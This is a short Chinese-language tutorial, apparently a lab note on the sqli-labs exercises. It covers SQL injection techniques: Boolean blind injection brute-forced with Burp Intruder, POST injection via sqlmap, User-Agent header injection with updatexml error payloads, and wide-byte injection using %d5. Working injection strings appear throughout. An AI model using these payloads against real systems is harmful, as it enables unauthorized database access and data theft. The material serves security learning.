SQL注入篇二------利用burp盲注,post注入,http头注入,利用burpsuit找注入点,宽字节注入
1.布尔盲注burpsuit的使用
先自己构造好注入语句,利用burpsuit抓包,设置变量,查出想要的信息。
比如----查数据库名的ascii码得到数据库构造好语句
http://123.206.227.79/Less-8/?id=1' and ascii(sbustr(database(),1,1))=1 --+
抓包,发送到intruder,设置变量
第一个变量设置为numbers 1到8,第二个变量也设置为numbers 0到127 开始爆破,
2.post注入
其实并没有什么变化,还是之前的注入方式,无非之前在URL上插payload,现在得抓包,在post参数里插payload,还是显注,布尔,时间盲注,爆错注入,套用之前的payload就可以。
抓到post包 参数后加* 保存为txt有sqlmap检测
3.http头注入
1、Accept:告诉 WEB 服务器自己接受什么介质类型,*/* 表示任何类型,type/* 表示该类型下的所有子类型,type/sub-type
2、Referer:浏览器向 WEB 服务器表明自己是从哪个 网页/URL 获得/点击 当前请求中的网址/URL。例如:Referer:http://www.sina.com/
3、User-Agent: 浏览器表明自己的身份(是哪种浏览器)。例如:User-Agent:Mozilla/5.0(Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.14) Gecko/20080404 Firefox/2、0、0、14
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent','$IP', $uname)"; 将 useragent 和 ip 插入到数据库中 构造闭合 'or updatexml(1,user(),1)+' $insert="INSERT INTO `security`.`uagents`+(`uagent'or updatexml(1,user(),1)+'`, `ip_address`, `username`) VALUES ('$uagent','$IP', $uname)"; c'+updatexml(1,concat(0x7e,database(),0x7e),1)+' c'+updatexml(1,concat(0x7e,database(),0x7e),1)and'
4利用burpsuit查找注入点
先抓包设置好变量
设置payload
开始攻击
5.宽字节注入
构造id参数的查询语句,各种试id的值,发现结果只有一句话和空白页两种情况。然后添加单引号发现返回空白页。
由于加单引号会出现空白页,没有报错,尝试宽字节注入
加 %d5 让单引号逃逸出来
很好的书burpsuit实战指南